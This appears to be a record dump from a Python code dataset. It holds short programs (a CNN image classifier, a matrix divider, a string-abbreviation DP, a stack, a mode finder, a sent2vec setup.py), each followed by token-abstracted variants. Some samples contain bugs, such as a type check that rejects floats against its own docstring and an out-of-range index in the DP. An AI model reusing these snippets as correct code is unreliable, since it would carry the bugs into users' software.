CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'), 'wb')\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_acc_out)\n val_acc_out.close()\n accIndex += 1\n pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')\n p_upload = pickle.load(pickle_upload)\n print(p_upload)\n if history.history.get('val_loss')[-1] < min:\n min = history.history.get('val_loss')[-1]\n if lossIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex - 1,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_loss_out)\n val_loss_out.close()\n lossIndex += 1\nmodel.save('64x3-CNN.model')\nCATEGORIES = ['Dog', 'Cat']\n\n\ndef prepare(filepath):\n IMG_SIZE = 299\n img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)\n\n\nmodel = tf.keras.models.load_model('64x3-CNN.model')\nprediction = model.predict([prepare('dog.jpg')])\nprint(prediction)\nprint(prediction[0][0])\nprint(CATEGORIES[int(prediction[0][0])])\nprediction = model.predict([prepare('cat.jpg')])\nprint(prediction)\nprint(CATEGORIES[int(prediction[0][0])])\n<docstring token>\n", "<docstring token>\n<import token>\n<assignment token>\nfor category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n for img in os.listdir(path):\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)\n plt.imshow(img_array, cmap='gray')\n plt.show()\n print(img_array)\n print(img_array.shape)\n break\n break\n<assignment token>\nplt.imshow(resized_img_array, cmap='gray')\nplt.show()\n<assignment token>\n\n\ndef create_training_data():\n for category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n classIndex = CATEGORIES.index(category)\n for img in os.listdir(path):\n try:\n img_array = cv2.imread(os.path.join(path, img), cv2.\n IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n training_data.append([resized_img_array, classIndex])\n except Exception as e:\n pass\n\n\ncreate_training_data()\nprint(len(training_data))\n<docstring token>\nrandom.shuffle(training_data)\n<assignment token>\nfor features, label in training_data:\n x.append(features)\n y.append(label)\n<assignment token>\npickle.dump(x, pickle_out)\npickle_out.close()\n<assignment token>\npickle.dump(y, pickle_out)\npickle_out.close()\n<assignment token>\nfor dense_layer in dense_layers:\n for layer_size in layer_sizes:\n for conv_layer in conv_layers:\n NAME = '{}-conv-{}-nodes-{}-dense-{}'.format(conv_layer,\n layer_size, dense_layer, int(time.time()))\n print(NAME)\n model = Sequential()\n model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n for l in range(conv_layer - 1):\n model.add(Conv2D(layer_size, (5, 5)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Dropout(DROPOUT))\n model.add(Flatten())\n for _ in range(dense_layer):\n model.add(Dense(layer_size))\n model.add(Activation('relu'))\n model.add(Dropout(DROPOUT))\n model.add(Dense(NB_CLASSES))\n model.add(Activation('softmax'))\n tensorboard = TensorBoard(log_dir='logs/{}'.format(NAME))\n model.compile(loss='categorical_crossentropy', optimizer=\n OPTIMIZER, metrics=['accuracy'])\n history = model.fit(x, y, batch_size=BATCH_SIZE, epochs=\n NB_EPOCHS, validation_split=VALIDATION_SPLIT, verbose=1,\n callbacks=[tensorboard])\n if history.history.get('val_acc')[-1] > max:\n max = history.history.get('val_acc')[-1]\n if accIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex - 1,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'), 'wb')\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_acc_out)\n val_acc_out.close()\n accIndex += 1\n pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')\n p_upload = pickle.load(pickle_upload)\n print(p_upload)\n if history.history.get('val_loss')[-1] < min:\n min = history.history.get('val_loss')[-1]\n if lossIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex - 1,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_loss_out)\n val_loss_out.close()\n lossIndex += 1\nmodel.save('64x3-CNN.model')\n<assignment token>\n\n\ndef prepare(filepath):\n IMG_SIZE = 299\n img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)\n\n\n<assignment token>\nprint(prediction)\nprint(prediction[0][0])\nprint(CATEGORIES[int(prediction[0][0])])\n<assignment token>\nprint(prediction)\nprint(CATEGORIES[int(prediction[0][0])])\n<docstring token>\n", "<docstring token>\n<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef create_training_data():\n for category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n classIndex = CATEGORIES.index(category)\n for img in os.listdir(path):\n try:\n img_array = cv2.imread(os.path.join(path, img), cv2.\n IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n training_data.append([resized_img_array, classIndex])\n except Exception as e:\n pass\n\n\n<code token>\n<docstring token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef prepare(filepath):\n IMG_SIZE = 299\n img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<docstring token>\n", "<docstring token>\n<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef create_training_data():\n for category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n classIndex = CATEGORIES.index(category)\n for img in os.listdir(path):\n try:\n img_array = cv2.imread(os.path.join(path, img), cv2.\n IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n training_data.append([resized_img_array, classIndex])\n except Exception as e:\n pass\n\n\n<code token>\n<docstring token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<docstring token>\n", "<docstring token>\n<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<code token>\n<docstring token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<docstring token>\n" ]
false
22
95c5971a102fb2ed84ab0de0471278d0167d8359
#!/usr/bin/python3 """1. Divide a matrix """ def matrix_divided(matrix, div): """Divides a Matrix Args: matrix: A list of lists of ints or floats div: a non zero int or float Exceptions: TypeError: if the matrix and/or div is not as stated or the matrix elements are not of the same size ZeroDivisionError: if div is zero Returns: a new matrix holding the results """ workmat = [] WrongType = False TooLong = False i = 0 if isinstance(matrix, list): if matrix == []: WrongType = True for x in range(len(matrix)): if isinstance(matrix[x], list): workmat.append([]) for y in range(len(matrix[x])): if matrix[x] == []: WrongType = True if ( isinstance(matrix[x][y], int) or isinstance(matrix[x][y], int) ): workmat[x].append(matrix[x][y]) else: WrongType = True if x == 0 and y == 0: i = len(matrix[x]) else: if not i == len(matrix[x]): TooLong = True else: WrongType = True else: WrongType = True if WrongType: raise TypeError( "matrix must be a matrix (list of lists) of integers/floats") if TooLong: raise TypeError( "Each row of the matrix must have the same size") if not isinstance(div, float) and not isinstance(div, int): raise TypeError( "div must be a number") if div == 0: raise ZeroDivisionError( "division by zero") for x in range(len(workmat)): for y in range(len(workmat[x])): workmat[x][y] = round((workmat[x][y] / div), 2) return workmat
[ "#!/usr/bin/python3\n\"\"\"1. Divide a matrix \"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\"Divides a Matrix\n\n Args:\n matrix: A list of lists of ints or floats\n div: a non zero int or float\n\n Exceptions:\n TypeError: if the matrix and/or div is not as stated or the matrix elements\n are not of the same size\n ZeroDivisionError: if div is zero\n\n Returns: a new matrix holding the results\n\n \"\"\"\n workmat = []\n WrongType = False\n TooLong = False\n i = 0\n if isinstance(matrix, list):\n if matrix == []:\n WrongType = True\n for x in range(len(matrix)):\n if isinstance(matrix[x], list):\n workmat.append([])\n for y in range(len(matrix[x])):\n if matrix[x] == []:\n WrongType = True\n if (\n isinstance(matrix[x][y], int) or\n isinstance(matrix[x][y], int)\n ):\n workmat[x].append(matrix[x][y])\n else:\n WrongType = True\n if x == 0 and y == 0:\n i = len(matrix[x])\n else:\n if not i == len(matrix[x]):\n TooLong = True\n else:\n WrongType = True\n else:\n WrongType = True\n if WrongType:\n raise TypeError(\n \"matrix must be a matrix (list of lists) of integers/floats\")\n if TooLong:\n raise TypeError(\n \"Each row of the matrix must have the same size\")\n if not isinstance(div, float) and not isinstance(div, int):\n raise TypeError(\n \"div must be a number\")\n if div == 0:\n raise ZeroDivisionError(\n \"division by zero\")\n\n for x in range(len(workmat)):\n for y in range(len(workmat[x])):\n workmat[x][y] = round((workmat[x][y] / div), 2)\n return workmat\n", "<docstring token>\n\n\ndef matrix_divided(matrix, div):\n \"\"\"Divides a Matrix\n\n Args:\n matrix: A list of lists of ints or floats\n div: a non zero int or float\n\n Exceptions:\n TypeError: if the matrix and/or div is not as stated or the matrix elements\n are not of the same size\n ZeroDivisionError: if div is zero\n\n Returns: a new matrix holding the results\n\n \"\"\"\n workmat = []\n WrongType = False\n TooLong = False\n i = 0\n if isinstance(matrix, list):\n if matrix == []:\n WrongType = True\n for x in range(len(matrix)):\n if isinstance(matrix[x], list):\n workmat.append([])\n for y in range(len(matrix[x])):\n if matrix[x] == []:\n WrongType = True\n if isinstance(matrix[x][y], int) or isinstance(matrix[x\n ][y], int):\n workmat[x].append(matrix[x][y])\n else:\n WrongType = True\n if x == 0 and y == 0:\n i = len(matrix[x])\n elif not i == len(matrix[x]):\n TooLong = True\n else:\n WrongType = True\n else:\n WrongType = True\n if WrongType:\n raise TypeError(\n 'matrix must be a matrix (list of lists) of integers/floats')\n if TooLong:\n raise TypeError('Each row of the matrix must have the same size')\n if not isinstance(div, float) and not isinstance(div, int):\n raise TypeError('div must be a number')\n if div == 0:\n raise ZeroDivisionError('division by zero')\n for x in range(len(workmat)):\n for y in range(len(workmat[x])):\n workmat[x][y] = round(workmat[x][y] / div, 2)\n return workmat\n", "<docstring token>\n<function token>\n" ]
false
23
5fb998fa761b989c6dd423634824197bade4f8a5
""" You can perform the following operations on the string, : Capitalize zero or more of 's lowercase letters. Delete all of the remaining lowercase letters in . Given two strings, and , determine if it's possible to make equal to as described. If so, print YES on a new line. Otherwise, print NO. For example, given and , in we can convert and delete to match . If and , matching is not possible because letters may only be capitalized or discarded, not changed. Function Description Complete the function in the editor below. It must return either or . abbreviation has the following parameter(s): a: the string to modify b: the string to match Input Format The first line contains a single integer , the number of queries. Each of the next pairs of lines is as follows: - The first line of each query contains a single string, . - The second line of each query contains a single string, . Constraints String consists only of uppercase and lowercase English letters, ascii[A-Za-z]. String consists only of uppercase English letters, ascii[A-Z]. Output Format For each query, print YES on a new line if it's possible to make string equal to string . Otherwise, print NO. Sample Input 1 daBcd ABC Sample Output YES Explanation image We have daBcd and ABC. We perform the following operation: Capitalize the letters a and c in so that dABCd. Delete all the remaining lowercase letters in so that ABC. Because we were able to successfully convert to , we print YES on a new line. """ #!/bin/python3 import math import os import random import re import sys # Complete the abbreviation function below. def abbreviation(a, b): m, n = len(a), len(b) dp = [[False]*(m+1) for _ in range(n+1)] dp[0][0] = True for i in range(n+1): for j in range(1,m+1): if a[j-1] == b[i-1]: dp[i][j] = dp[i-1][j-1] elif a[j-1].upper() == b[i-1]: dp[i][j] = dp[i-1][j-1] or dp[i][j-1] elif a[j-1].islower(): dp[i][j] = dp[i][j-1] return "YES" if dp[n][m] else "NO" if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') q = int(input()) for q_itr in range(q): a = input() b = input() result = abbreviation(a, b) fptr.write(result + '\n') fptr.close()
[ "\"\"\"\nYou can perform the following operations on the string, :\n\nCapitalize zero or more of 's lowercase letters.\nDelete all of the remaining lowercase letters in .\nGiven two strings, and , determine if it's possible to make equal to as described. If so, print YES on a new line. Otherwise, print NO.\n\nFor example, given and , in we can convert and delete to match . If and , matching is not possible because letters may only be capitalized or discarded, not changed.\n\nFunction Description\n\nComplete the function in the editor below. It must return either or .\n\nabbreviation has the following parameter(s):\n\na: the string to modify\nb: the string to match\nInput Format\n\nThe first line contains a single integer , the number of queries.\n\nEach of the next pairs of lines is as follows:\n- The first line of each query contains a single string, .\n- The second line of each query contains a single string, .\n\nConstraints\n\nString consists only of uppercase and lowercase English letters, ascii[A-Za-z].\nString consists only of uppercase English letters, ascii[A-Z].\nOutput Format\n\nFor each query, print YES on a new line if it's possible to make string equal to string . Otherwise, print NO.\n\nSample Input\n\n1\ndaBcd\nABC\nSample Output\n\nYES\nExplanation\n\nimage\n\nWe have daBcd and ABC. We perform the following operation:\n\nCapitalize the letters a and c in so that dABCd.\nDelete all the remaining lowercase letters in so that ABC.\nBecause we were able to successfully convert to , we print YES on a new line.\n\n\n\"\"\"\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# Complete the abbreviation function below.\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [[False]*(m+1) for _ in range(n+1)]\n dp[0][0] = True\n for i in range(n+1):\n for j in range(1,m+1):\n if a[j-1] == b[i-1]:\n dp[i][j] = dp[i-1][j-1]\n elif a[j-1].upper() == b[i-1]:\n dp[i][j] = dp[i-1][j-1] or dp[i][j-1]\n elif a[j-1].islower():\n dp[i][j] = dp[i][j-1]\n return \"YES\" if dp[n][m] else \"NO\"\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n q = int(input())\n\n for q_itr in range(q):\n a = input()\n\n b = input()\n\n result = abbreviation(a, b)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n", "<docstring token>\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [([False] * (m + 1)) for _ in range(n + 1)]\n dp[0][0] = True\n for i in range(n + 1):\n for j in range(1, m + 1):\n if a[j - 1] == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n elif a[j - 1].upper() == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]\n elif a[j - 1].islower():\n dp[i][j] = dp[i][j - 1]\n return 'YES' if dp[n][m] else 'NO'\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n q = int(input())\n for q_itr in range(q):\n a = input()\n b = input()\n result = abbreviation(a, b)\n fptr.write(result + '\\n')\n fptr.close()\n", "<docstring token>\n<import token>\n\n\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [([False] * (m + 1)) for _ in range(n + 1)]\n dp[0][0] = True\n for i in range(n + 1):\n for j in range(1, m + 1):\n if a[j - 1] == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n elif a[j - 1].upper() == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]\n elif a[j - 1].islower():\n dp[i][j] = dp[i][j - 1]\n return 'YES' if dp[n][m] else 'NO'\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n q = int(input())\n for q_itr in range(q):\n a = input()\n b = input()\n result = abbreviation(a, b)\n fptr.write(result + '\\n')\n fptr.close()\n", "<docstring token>\n<import token>\n\n\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [([False] * (m + 1)) for _ in range(n + 1)]\n dp[0][0] = True\n for i in range(n + 1):\n for j in range(1, m + 1):\n if a[j - 1] == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n elif a[j - 1].upper() == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]\n elif a[j - 1].islower():\n dp[i][j] = dp[i][j - 1]\n return 'YES' if dp[n][m] else 'NO'\n\n\n<code token>\n", "<docstring token>\n<import token>\n<function token>\n<code token>\n" ]
false
24
5ed439a2a7cfb9c941c40ea0c5eba2851a0f2855
#!/bin/python3 # Implement a stack with push, pop, inc(e, k) operations # inc (e,k) - Add k to each of bottom e elements import sys class Stack(object): def __init__(self): self.arr = [] def push(self, val): self.arr.append(val) def pop(self): if len(self.arr): return self.arr.pop() def inc(self, e, k): count = min(len(self.arr), e) for i in range(count): self.arr[i] += k def peek(self): if len(self.arr): return self.arr[-1] else: return 'EMPTY' def superStack(operations): s = Stack() for o in operations: op = o.split(' ') if op[0] == 'push': s.push(int(op[1])) print(s.peek()) elif op[0] == 'pop': s.pop() print(s.peek()) elif op[0] == 'inc': s.inc(int(op[1]), int(op[2])) print(s.peek()) if __name__ == "__main__": operations_cnt = 0 operations_cnt = int(input()) operations_i = 0 operations = [] while operations_i < operations_cnt: try: operations_item = str(input()) except: operations_item = None operations.append(operations_item) operations_i += 1 res = superStack(operations);
[ "#!/bin/python3\n\n# Implement a stack with push, pop, inc(e, k) operations\n# inc (e,k) - Add k to each of bottom e elements\nimport sys\n\nclass Stack(object):\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n\n def pop(self):\n if len(self.arr):\n return self.arr.pop()\n\n def inc(self, e, k):\n count = min(len(self.arr), e)\n for i in range(count):\n self.arr[i] += k\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\ndef superStack(operations):\n s = Stack()\n for o in operations:\n op = o.split(' ')\n if op[0] == 'push':\n s.push(int(op[1]))\n print(s.peek())\n elif op[0] == 'pop':\n s.pop()\n print(s.peek())\n elif op[0] == 'inc':\n s.inc(int(op[1]), int(op[2]))\n print(s.peek())\n \n\nif __name__ == \"__main__\":\n operations_cnt = 0\n operations_cnt = int(input())\n operations_i = 0\n operations = []\n while operations_i < operations_cnt:\n try:\n operations_item = str(input())\n except:\n operations_item = None\n operations.append(operations_item)\n operations_i += 1\n\n\n res = superStack(operations);\n \n\n", "import sys\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n\n def pop(self):\n if len(self.arr):\n return self.arr.pop()\n\n def inc(self, e, k):\n count = min(len(self.arr), e)\n for i in range(count):\n self.arr[i] += k\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\ndef superStack(operations):\n s = Stack()\n for o in operations:\n op = o.split(' ')\n if op[0] == 'push':\n s.push(int(op[1]))\n print(s.peek())\n elif op[0] == 'pop':\n s.pop()\n print(s.peek())\n elif op[0] == 'inc':\n s.inc(int(op[1]), int(op[2]))\n print(s.peek())\n\n\nif __name__ == '__main__':\n operations_cnt = 0\n operations_cnt = int(input())\n operations_i = 0\n operations = []\n while operations_i < operations_cnt:\n try:\n operations_item = str(input())\n except:\n operations_item = None\n operations.append(operations_item)\n operations_i += 1\n res = superStack(operations)\n", "<import token>\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n\n def pop(self):\n if len(self.arr):\n return self.arr.pop()\n\n def inc(self, e, k):\n count = min(len(self.arr), e)\n for i in range(count):\n self.arr[i] += k\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\ndef superStack(operations):\n s = Stack()\n for o in operations:\n op = o.split(' ')\n if op[0] == 'push':\n s.push(int(op[1]))\n print(s.peek())\n elif op[0] == 'pop':\n s.pop()\n print(s.peek())\n elif op[0] == 'inc':\n s.inc(int(op[1]), int(op[2]))\n print(s.peek())\n\n\nif __name__ == '__main__':\n operations_cnt = 0\n operations_cnt = int(input())\n operations_i = 0\n operations = []\n while operations_i < operations_cnt:\n try:\n operations_item = str(input())\n except:\n operations_item = None\n operations.append(operations_item)\n operations_i += 1\n res = superStack(operations)\n", "<import token>\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n\n def pop(self):\n if len(self.arr):\n return self.arr.pop()\n\n def inc(self, e, k):\n count = min(len(self.arr), e)\n for i in range(count):\n self.arr[i] += k\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\ndef superStack(operations):\n s = Stack()\n for o in operations:\n op = o.split(' ')\n if op[0] == 'push':\n s.push(int(op[1]))\n print(s.peek())\n elif op[0] == 'pop':\n s.pop()\n print(s.peek())\n elif op[0] == 'inc':\n s.inc(int(op[1]), int(op[2]))\n print(s.peek())\n\n\n<code token>\n", "<import token>\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n\n def pop(self):\n if len(self.arr):\n return self.arr.pop()\n\n def inc(self, e, k):\n count = min(len(self.arr), e)\n for i in range(count):\n self.arr[i] += k\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n\n def pop(self):\n if len(self.arr):\n return self.arr.pop()\n <function token>\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n <function token>\n <function token>\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n <function token>\n <function token>\n <function token>\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass Stack(object):\n <function token>\n <function token>\n <function token>\n <function token>\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass Stack(object):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<code token>\n", "<import token>\n<class token>\n<function token>\n<code token>\n" ]
false
25
39f9341313e29a22ec5e05ce9371bf65e89c91bd
""" 리스트에 있는 숫자들의 최빈값을 구하는 프로그램을 만들어라. [12, 17, 19, 17, 23] = 17 [26, 37, 26, 37, 91] = 26, 37 [28, 30, 32, 34, 144] = 없다 최빈값 : 자료의 값 중에서 가장 많이 나타난 값 ① 자료의 값이 모두 같거나 모두 다르면 최빈값은 없다. ② 자료의 값이 모두 다를 때, 도수가 가장 큰 값이 1개 이상 있으면 그 값은 모두 최빈값이다. """ n_list = [[12, 17, 19, 17, 23], [26, 37, 26, 37, 91], [28, 30, 32, 34, 144], [10, 10, 10, 10, 10]] for numbers in n_list: n_dict = {} for n in numbers: if n in n_dict: n_dict[n] += 1 else: n_dict[n] = 1 mode = [] if len(n_dict) == 1 or len(n_dict) == len(numbers): print(numbers, '= 없다') else: mode_count = max(n_dict.values()) for e in n_dict.keys(): if n_dict[e] == mode_count: mode.append(e) print(numbers, '=', mode)
[ "\"\"\"\n리스트에 있는 숫자들의 최빈값을 구하는 프로그램을 만들어라.\n\n[12, 17, 19, 17, 23] = 17\n[26, 37, 26, 37, 91] = 26, 37\n[28, 30, 32, 34, 144] = 없다\n\n최빈값 : 자료의 값 중에서 가장 많이 나타난 값 \n① 자료의 값이 모두 같거나 모두 다르면 최빈값은 없다.\n② 자료의 값이 모두 다를 때, 도수가 가장 큰 값이 1개 이상 있으면 그 값은 모두 최빈값이다.\n\"\"\"\n\nn_list = [[12, 17, 19, 17, 23],\n [26, 37, 26, 37, 91],\n [28, 30, 32, 34, 144],\n [10, 10, 10, 10, 10]]\n \nfor numbers in n_list:\n n_dict = {}\n for n in numbers:\n if n in n_dict:\n n_dict[n] += 1\n else:\n n_dict[n] = 1\n mode = []\n if len(n_dict) == 1 or len(n_dict) == len(numbers):\n print(numbers, '= 없다')\n else:\n mode_count = max(n_dict.values())\n for e in n_dict.keys():\n if n_dict[e] == mode_count:\n mode.append(e)\n print(numbers, '=', mode)\n", "<docstring token>\nn_list = [[12, 17, 19, 17, 23], [26, 37, 26, 37, 91], [28, 30, 32, 34, 144],\n [10, 10, 10, 10, 10]]\nfor numbers in n_list:\n n_dict = {}\n for n in numbers:\n if n in n_dict:\n n_dict[n] += 1\n else:\n n_dict[n] = 1\n mode = []\n if len(n_dict) == 1 or len(n_dict) == len(numbers):\n print(numbers, '= 없다')\n else:\n mode_count = max(n_dict.values())\n for e in n_dict.keys():\n if n_dict[e] == mode_count:\n mode.append(e)\n print(numbers, '=', mode)\n", "<docstring token>\n<assignment token>\nfor numbers in n_list:\n n_dict = {}\n for n in numbers:\n if n in n_dict:\n n_dict[n] += 1\n else:\n n_dict[n] = 1\n mode = []\n if len(n_dict) == 1 or len(n_dict) == len(numbers):\n print(numbers, '= 없다')\n else:\n mode_count = max(n_dict.values())\n for e in n_dict.keys():\n if n_dict[e] == mode_count:\n mode.append(e)\n print(numbers, '=', mode)\n", "<docstring token>\n<assignment token>\n<code token>\n" ]
false
26
312cc666c88fcd22882c49598db8c5e18bd3dae1
from setuptools import setup, find_packages from setuptools.extension import Extension from sys import platform cython = True try: from Cython.Build import cythonize cython = True except ImportError: cython = False # Define the C++ extension if platform == "darwin": extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x', '-stdlib=libc++', '-mmacosx-version-min=10.7'] else: extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x'] extensions = [] if cython: extensions = [ Extension('sent2vec', sources=[ 'sent2vec/sent2vec.pyx', 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc', 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc', 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc', 'sent2vec/cpp/src/productquantizer.cc', 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc', 'sent2vec/cpp/src/vector.cc' ], language='c++', extra_compile_args=extra_compile_args ) ] extensions = cythonize(extensions) else: extensions = [ Extension('sent2vec', sources=[ 'sent2vec/sent2vec.cpp', 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc', 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc', 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc', 'sent2vec/cpp/src/productquantizer.cc', 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc', 'sent2vec/cpp/src/vector.cc' ], language='c++', extra_compile_args=extra_compile_args ) ] # Package details setup( name='sent2vec', version='0.1.0', author='', author_email='', url='', description='A Python interface for sent2vec library', license='BSD 3-Clause License', packages=['sent2vec'], ext_modules = extensions, install_requires=[], classifiers= [] )
